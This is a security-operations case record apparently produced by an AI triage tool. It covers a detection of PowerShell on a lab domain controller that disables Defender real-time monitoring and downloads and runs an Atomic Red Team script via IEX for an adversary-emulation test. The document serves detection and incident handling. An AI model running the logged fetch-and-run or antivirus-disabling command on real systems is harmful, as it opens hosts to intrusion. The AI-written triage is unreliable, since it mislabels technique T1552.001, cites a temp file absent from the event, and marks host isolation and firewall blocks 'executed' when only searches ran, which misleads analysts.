critical closed true positive

๐Ÿท๏ธ Analyst Verdict Classification

TP by analyst

🤖 AI Analysis

🔔 Detections (1)

Realtime Monitoring Process Killed PID 9164 critical
Rule: general.RealTime Monitoring Tampering
Hostname: df-labsdc01.dflabs.local · Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 92% · Verdict: true positive
Event Data:
BASE_ADDRESS:
140694944940032
COMMAND_LINE:
PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1552.001 -CheckPrereqs ; Invoke-AtomicTest T1552.001 -GetPrereqs ; Invoke-AtomicTest T1552.001
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
238641152
PARENT:
{'BASE_ADDRESS': 140698856259584, 'COMMAND_LINE': 'cmd.exe /C C:\\Windows\\TEMP\\pldDCD7.tmp.bat T1552.001 ', 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\cmd.exe', 'HASH': '3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2', 'MEMORY_USAGE': 4489216, 'PARENT_ATOM': 'd2b1ecad7af81b32ac16ae0d69c2a7fe', 'PARENT_PROCESS_ID': 3496, 'PROCESS_ID': 9164, 'THIS_ATOM': '2eddc57635edafdc772cd43169c2a851', 'THREADS': 3, 'TIMESTAMP': 1774364752869, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
9164
PROCESS_ID:
2584
THREADS:
31
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs:
{'type': 'command_line', 'value': "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)"}
{'type': 'url', 'value': 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1'}
{'type': 'technique', 'value': 'T1552.001 - Exploitation of Remote Code Execution'}
MITRE: T1552.001 T1059.004 T1567.001
Analyst Declaration:
📄 Raw Detection JSON
{
  "author": "ckeller@fusioncybersecurity.us",
  "cat": "Realtime Monitoring Process Killed PID 9164",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1552.001 -CheckPrereqs ; Invoke-AtomicTest T1552.001 -GetPrereqs ; Invoke-AtomicTest T1552.001 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 238641152,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldDCD7.tmp.bat T1552.001 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4489216,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 9164,
        "THIS_ATOM": "2eddc57635edafdc772cd43169c2a851",
        "THREADS": 3,
        "TIMESTAMP": 1774364752869,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 9164,
      "PROCESS_ID": 2584,
      "THREADS": 31,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "6741a4a8-eb86-4026-9e1a-0da01f2f48fe",
      "event_time": 1774364753471,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3256,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "2eddc57635edafdc772cd43169c2a851",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "0faf1760d8bf36ee150fa36d69c2a853"
    }
  },
  "detect_id": "88437190-1557-4f5c-86d2-c11e69c2a854",
  "gen_time": 1774364756732,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364753\u0026selected=0faf1760d8bf36ee150fa36d69c2a853",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "6741a4a8-eb86-4026-9e1a-0da01f2f48fe",
    "event_time": 1774364753471,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3256,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "2eddc57635edafdc772cd43169c2a851",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "0faf1760d8bf36ee150fa36d69c2a853"
  },
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "general.RealTime Monitoring Tampering",
  "ts": 1774364756000
}
๐ŸŒ Threat Intel JSON
{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}
🤖 Triage JSON
{
  "confidence": 0.925,
  "false_positive_reason": null,
  "investigation_questions": [
    "What other processes were spawned by PID 2584 that are not listed in the sensor context?",
    "Was this event triggered by a scheduled task or user-initiated action?",
    "Are there any active network connections established by the PowerShell process?"
  ],
  "ioc_analysis": "The process is running legitimate WindowsPowerShell.exe but executing highly suspicious commands including disabling Microsoft Defender (Set-MpPreference), downloading code via IEX, and invoking ART modules for testing T1552.001 (Exploitation of Remote Code Execution). The parent process chain shows cmd.exe spawning PowerShell, which is a common technique for obfuscation.",
  "iocs_extracted": [
    {
      "type": "command_line",
      "value": "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)"
    },
    {
      "type": "url",
      "value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
    },
    {
      "type": "technique",
      "value": "T1552.001 - Exploitation of Remote Code Execution"
    }
  ],
  "mitre_techniques": [
    "T1552.001",
    "T1059.004",
    "T1567.001"
  ],
  "recommended_actions": [
    "ESCALATE to Incident Response (unanimous AI verdict)",
    "Isolate affected sensor immediately",
    "Immediately isolate the host from the network to prevent lateral movement or data exfiltration.",
    "Block outbound traffic to redcanaryco/invoke-atomicredteam repository at the firewall level.",
    "Review and disable the Set-MpPreference command execution in PowerShell history logs.",
    "Perform forensic analysis on C:\\Windows\\Temp\\RESE3B4.tmp for potential persistence mechanisms."
  ],
  "risk_score": 90,
  "severity": "critical",
  "summary": "**Vote: UNANIMOUS (2/2 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed attempt to disable real-time monitoring and deploy the Atomic Red Team (ART) framework using PowerShell under SYSTEM privileges. The command explicitly disables antivirus protection and downloads malicious payloads from an external GitHub repository.\n\n**IOC Analysis:** The process is running legitimate WindowsPowerShell.exe but executing highly suspicious commands including disabling Microsoft Defender (Set-MpPreference), downloading code via IEX, and invoking ART modules for testing T1552.001 (Exploitation of Remote Code Execution). The parent process chain shows cmd.exe spawning PowerShell, which is a common technique for obfuscation.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.9\nA PowerShell process running under SYSTEM account executed commands to disable real-time monitoring and install Atomic Red Team tools, indicating a potential attack to bypass security measures.\n\n**IOC Analysis:** The FILE_PATH is a legitimate Windows system binary located in C:\\Windows\\System32\\, but the command line involves disabling Microsoft Defender real-time monitoring and downloading scripts from GitHub, which is highly suspicious. The hash is signed, but the malicious command negates its legitimacy. The parent process is cmd.exe from TEMP, which is a common attack vector.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "escalate_ir",
    "mode": "unanimous",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: true_positive (high, 90% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.9,
        "model": "deepseek-r1:8b",
        "verdict": "true_positive"
      }
    ],
    "winning_count": 2,
    "winning_verdict": "true_positive"
  }
}

โš™๏ธ Response Actions

Action | Target | Status | Result
tag | e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
recommended | ESCALATE to Incident Response (unanimous AI verdict) | executed | General Activity Sweep: 0 events found
recommended | Isolate affected sensor immediately | executed | General Activity Sweep: 0 events found
recommended | Immediately isolate the host from the network to prevent lateral movement or data exfiltration. | executed | Lateral Movement Investigation: 50 events found
recommended | Block outbound traffic to redcanaryco/invoke-atomicredteam repository at the firewall level. | executed | General Activity Sweep: 0 events found
recommended | Review and disable the Set-MpPreference command execution in PowerShell history logs. | executed | General Activity Sweep: 0 events found
recommended | Perform forensic analysis on C:\Windows\Temp\RESE3B4.tmp for potential persistence mechanisms. | executed | Persistence Check: 0 events found

๐Ÿ“ Add Note

💬 Notes (7)

🤖 FusionSOC AI 2026-03-24T16:08
🤖 FusionSOC AI 2026-03-24T16:08
🤖 FusionSOC AI 2026-03-24T16:08
🤖 FusionSOC AI 2026-03-24T16:08
🤖 FusionSOC AI 2026-03-24T16:08
🤖 FusionSOC AI 2026-03-24T16:08
🤖 FusionSOC AI 2026-03-24T16:08

📜 Timeline

2026-03-24T17:24:18
analyst
Status changed: investigating → closed
2026-03-24T17:23:59
analyst
Analyst classified as True Positive (TP)
2026-03-24T16:08:29
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:08:29
FusionSOC
Action recommended → executed: Persistence Check: 0 events found
2026-03-24T16:08:29
FusionSOC AI
Note by FusionSOC AI: ## ๐Ÿ” Persistence Check **Action:** Perform forensic analysis on C:\Windows\Temp\RESE3B4.tmp for potential persistence me...
2026-03-24T16:08:28
FusionSOC
Response action queued: recommended on Perform forensic analysis on C:\Windows\Temp\RESE3B4.tmp for potential persistence mechanisms.
2026-03-24T16:08:28
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:08:28
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:08:28
FusionSOC AI
Note by FusionSOC AI: ## ๐Ÿ” General Activity Sweep **Action:** Review and disable the Set-MpPreference command execution in PowerShell history ...
2026-03-24T16:08:28
FusionSOC
Response action queued: recommended on Review and disable the Set-MpPreference command execution in PowerShell history logs.
2026-03-24T16:08:28
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:08:28
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:08:28
FusionSOC AI
Note by FusionSOC AI: ## ๐Ÿ” General Activity Sweep **Action:** Block outbound traffic to redcanaryco/invoke-atomicredteam repository at the fir...
2026-03-24T16:08:28
FusionSOC
Response action queued: recommended on Block outbound traffic to redcanaryco/invoke-atomicredteam repository at the firewall level.
2026-03-24T16:08:28
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:08:28
FusionSOC
Action recommended → executed: Lateral Movement Investigation: 50 events found
2026-03-24T16:08:28
FusionSOC AI
Note by FusionSOC AI: ## ๐Ÿ” Lateral Movement Investigation **Action:** Immediately isolate the host from the network to prevent lateral movemen...
2026-03-24T16:08:27
FusionSOC
Response action queued: recommended on Immediately isolate the host from the network to prevent lateral movement or data exfiltration.
2026-03-24T16:08:27
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:08:27
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:08:27
FusionSOC AI
Note by FusionSOC AI: ## ๐Ÿ” General Activity Sweep **Action:** Isolate affected sensor immediately **Sensor:** `e4a1c62d-4d1f-44...` **Time Win...
2026-03-24T16:08:26
FusionSOC
Response action queued: recommended on Isolate affected sensor immediately
2026-03-24T16:08:26
FusionSOC AI
Status changed: open → investigating
2026-03-24T16:08:26
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:08:26
FusionSOC AI
Note by FusionSOC AI: ## ๐Ÿ” General Activity Sweep **Action:** ESCALATE to Incident Response (unanimous AI verdict) **Sensor:** `e4a1c62d-4d1f-...
2026-03-24T16:08:26
FusionSOC
Response action queued: recommended on ESCALATE to Incident Response (unanimous AI verdict)
2026-03-24T16:08:26
FusionSOC
Action tag → failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T16:08:26
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T16:08:26
FusionSOC AI
Detection 88437190-1557-4f5c-86d2-c11e69c2a854 triaged as true_positive (critical severity, confidence: 92%)
2026-03-24T16:08:26
FusionSOC AI
Case created from detection: general.RealTime Monitoring Tampering